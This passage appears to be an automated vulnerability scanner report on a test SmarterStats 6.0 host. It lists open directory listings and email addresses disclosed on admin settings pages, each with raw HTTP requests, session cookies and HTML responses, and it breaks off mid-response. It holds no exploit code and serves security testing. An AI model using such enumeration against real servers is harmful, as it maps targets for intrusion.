   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /UserControls/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,027 <A href="DeleteConfirmation.ascx">DeleteConfirmation.ascx</A>
Thursday, October 07, 2010 01:00 PM 125 <A href="DragDrop.ascx">DragDrop.ascx</A>
Thursday, October 07, 2010 01:00 PM 1,790 <A href="ImportingServerFields.ascx">ImportingServerFields.ascx</A>
Thursday, October 07, 2010 01:00 PM 1,358 <A href="LoadingMessage.ascx">LoadingMessage.ascx</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="PanelBarTemplates/">PanelBarTemplates</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Popups/">Popups</A>
Thursday, October 07, 2010 01:00 PM 1,427 <A href="ProcServerFields.ascx">ProcServerFields.ascx</A>
Thursday, October 07, 2010 01:00 PM 1,386 <A href="SearchBar.ascx">SearchBar.ascx</A>
Thursday, October 07, 2010 01:00 PM 389 <A href="SiteSeoSearchEngineSettings.ascx">SiteSeoSearchEngineSettings.ascx</A>
Thursday, October 07, 2010 01:00 PM 694 <A href="SiteSeoSettings.ascx">SiteSeoSettings.ascx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.70. http://vulnerable.smarterstats.6.0.host:9999/UserControls/PanelBarTemplates/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/PanelBarTemplates/

Request

GET /UserControls/PanelBarTemplates/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/UserControls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:24:03 GMT
Content-Length: 1700
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/PanelBarTemplates/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /UserControls/PanelBarTemplates/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/UserControls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 5,687 <A href="DataMine.ascx">DataMine.ascx</A>
Thursday, October 07, 2010 01:00 PM 2,382 <A href="EventsPanel.ascx">EventsPanel.ascx</A>
Thursday, October 07, 2010 01:00 PM 208 <A href="ReportOptions.ascx">ReportOptions.ascx</A>
Thursday, October 07, 2010 01:00 PM 998 <A href="SectionNavigator.ascx">SectionNavigator.ascx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.71. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/

Request

GET /UserControls/Popups/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:23:55 GMT
Content-Length: 1464
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/Popups/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /UserControls/Popups/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/UserControls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,069 <A href="frmEventGroup.aspx">frmEventGroup.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,630 <A href="frmHelp.aspx">frmHelp.aspx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.72. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /aspnet_client/

Request

GET /aspnet_client/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:30:55 GMT
Content-Length: 1337
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /aspnet_client/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /aspnet_client/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Wednesday, October 06, 2010 03:02 AM &lt;dir&gt; <A href="system_web/">system_web</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.73. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /aspnet_client/system_web/

Request

GET /aspnet_client/system_web/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:30:57 GMT
Content-Length: 1371
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /aspnet_client/system_web/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /aspnet_client/system_web/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/aspnet_client/">[To Parent Directory]</A>

Wednesday, October 06, 2010 03:02 AM &lt;dir&gt; <A href="4_0_30319/">4_0_30319</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

9. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


9.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmEmailReportSettings.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Admin/frmEmailReportSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:24 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8426



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Email Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmEmailReportSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwODk4MzY1MDUPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWCGYPZBYCAgEPZBYCAgIPDxYCHwQFFnNvbWVvbmVAeW91cmRvbWFpbi5jb21kZAIBD2QWAgIBD2QWAgICDw8WAh8EBQkxMjcuMC4wLjFkZAIDD2QWAgIBD2QWAgICDw8WAh8EZWRkAgQPZBYCAgEPZBYEZg8PZBYCHgxhdXRvY29tcGxldGUFA29mZmQCAg8PFgIfBGVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUsY3RsMDAkTVBIJGNoa1NNVFBBdXRoZW50aWNhdGlvbl9TZXR0aW5nQ2hlY2tSGzOL99CxzdQfS16581et8/thZWIK141DJBgffZRGig==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1',''], ['ctl00$BPH$btnSave','','ctl00$BPH$btnTest',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Email Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   <div id="ctl00_BPH_btnTest" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnTest',''); return false;"><span class="BBInner">Test Connection</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel1">
   
           <table class="SettingsContainer SCMarginTop" border="0">
       <tr id="ctl00_MPH_txtFromAddress">
           <td id="ctl00_MPH_txtFromAddress_Label" class="Indent Fixed">Email Address</td><td id="ctl00_MPH_txtFromAddress_Setting" class="Setting"><input name="ctl00$MPH$txtFromAddress_SettingText" type="text" value="someone@yourdomain.com" size="40" id="ctl00_MPH_txtFromAddress_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_txtSMTPServer">
           <td id="ctl00_MPH_txtSMTPServer_Label" class="Indent Fixed">SMTP Server</td><td id="ctl00_MPH_txtSMTPServer_Setting" class="Setting"><input name="ctl00$MPH$txtSMTPServer_SettingText" type="text" value="vulnerable.smarterstats.6.0.host" size="40" id="ctl00_MPH_txtSMTPServer_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_chkSMTPAuthentication">
           <td id="ctl00_MPH_chkSMTPAuthentication_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSMTPAuthentication_Setting" class="Setting"><input id="ctl00_MPH_chkSMTPAuthentication_SettingCheck" type="checkbox" name="ctl00$MPH$chkSMTPAuthentication_SettingCheck" /><label for="ctl00_MPH_chkSMTPAuthentication_SettingCheck">Enable SMTP authentication</label></td>
       </tr><tr id="ctl00_MPH_txtAuthUsername">
           <td id="ctl00_MPH_txtAuthUsername_Label" class="Indent Fixed">Auth Username</td><td id="ctl00_MPH_txtAuthUsername_Setting" class="Setting"><input name="ctl00$MPH$txtAuthUsername_SettingText" type="text" id="ctl00_MPH_txtAuthUsername_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_txtAuthPassword">
           <td id="ctl00_MPH_txtAuthPassword_Label" class="Indent Fixed">Auth Password</td><td id="ctl00_MPH_txtAuthPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAuthPassword_SettingText" type="password" id="ctl00_MPH_txtAuthPassword_SettingText" class="text" autocomplete="off" /></td>
       </tr>
   </table>
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmemailreportsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmEmailReportSettings\x2easpx?'); });
$('#ctl00_MPH_txtAuthPassword_SettingText').val('');
$(function() { SetTopTitle('Email\x20Settings'); });
modules['vmNotBlank_txt']='Must have a value';
modules['vmEmail_txt']='Must be an email address';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtFromAddress_SettingText","VMs":["vmNotBlank","vmEmail"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"SMTP Server","vcID":"ctl00_MPH_txtSMTPServer_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmOptional_txt']='Value is optional';
modules['vmRequiredIfChecked_txt']='Must have a value if enabled';
$(function() {$vc({"lt":"Auth Username","vcID":"ctl00_MPH_txtAuthUsername_SettingText","VMs":["vmOptional","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkSMTPAuthentication_SettingCheck","vmRequired":false}},false);});
$(function() {$vc({"lt":"Auth Password","vcID":"ctl00_MPH_txtAuthPassword_SettingText","VMs":["vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkSMTPAuthentication_SettingCheck","vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


9.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmGeneralSettings.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Admin/frmGeneralSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminSettings"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:31 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 20864



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   General Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmGeneralSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwOTA5ODE0NDIPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFggCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWBgICD2QWAgIBD2QWBGYPZBYCAgEPZBYCZg8QZA8WBmYCAQICAgMCBAIFFgYQBQIxMAUCMTBnEAUCMjUFAjI1ZxAFAzEwMAUDMTAwZxAFAzUwMAUDNTAwZxAFBDEwMDAFBDEwMDBnEAUDQWxsBQEwZ2RkAgEPZBYCAgEPZBYCZg8QZBAVAQdEZWZhdWx0FQEHRGVmYXVsdBQrAwFnZGQCBA9kFgICAQ9kFggCAQ9kFgICAQ9kFgICAg8PFgIfBAUFYWRtaW5kZAICD2QWAgIBD2QWAmYPD2QWAh4MYXV0b2NvbXBsZXRlBQNvZmZkAgMPZBYCAgEPZBYCZg8PZBYCHwUFA29mZmQCBA9kFgICAQ9kFgJmDw9kFgIfBQUDb2ZmZAIGD2QWAgIBD2QWBGYPZBYCAgEPZBYCAgIPDxYCHwQFGWFkbWluaXN0cmF0b3JAZXhhbXBsZS5jb21kZAIBD2QWAgIBD2QWAgICDw8WAh8EBQkxMjcuMC4wLjFkZBgEBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUgY3RsMDAkTVBIJGNoa0VuYWJsZV9TZXR0aW5nQ2hlY2sFMmN0bDAwJE1QSCRjaGtFbmFibGVBdXRvUmVtaW5kZXJQb3B1cHNfU2V0dGluZ0NoZWNrBS1jdGwwMCRNUEgkY2hrUmVzZXRHZXR0aW5nU3RhcnRlZF9TZXR0aW5nQ2hlY2sFLmN0bDAwJE1QSCRjaGtQcm9ibGVtRW1haWxzRW5hYmxlZF9TZXR0aW5nQ2hlY2sFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0yDzLwCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiw